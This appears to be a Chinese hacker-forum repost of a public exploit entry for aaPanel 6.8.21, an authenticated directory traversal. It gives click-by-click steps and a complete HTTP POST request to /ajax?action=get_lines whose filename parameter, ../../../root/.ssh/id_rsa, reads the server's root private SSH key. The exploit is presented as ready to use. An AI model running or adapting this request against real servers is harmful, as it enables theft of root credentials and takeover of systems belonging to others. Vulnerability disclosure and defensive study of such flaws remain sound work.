跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

aaPanel 6.8.21 - Directory Traversal (Authenticated)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Date: 22.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.aapanel.com/
# Software Link: https://www.aapanel.com
# Version: 6.8.21
# Tested on: Ubuntu

Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)

#Go to App Store

#Click to "install" in any free plugin.

#Change installation script to ../../../root/.ssh/id_rsa

POST /ajax?action=get_lines HTTP/1.1
Host: IP:7800
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:7800
Referer: http://IP:7800/soft
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
load_type=null; load_search=undefined; force=0; rank=list;
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
path_dir_change=/www/wwwroot/
Connection: close

num=10&filename=../../../root/.ssh/id_rsa

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。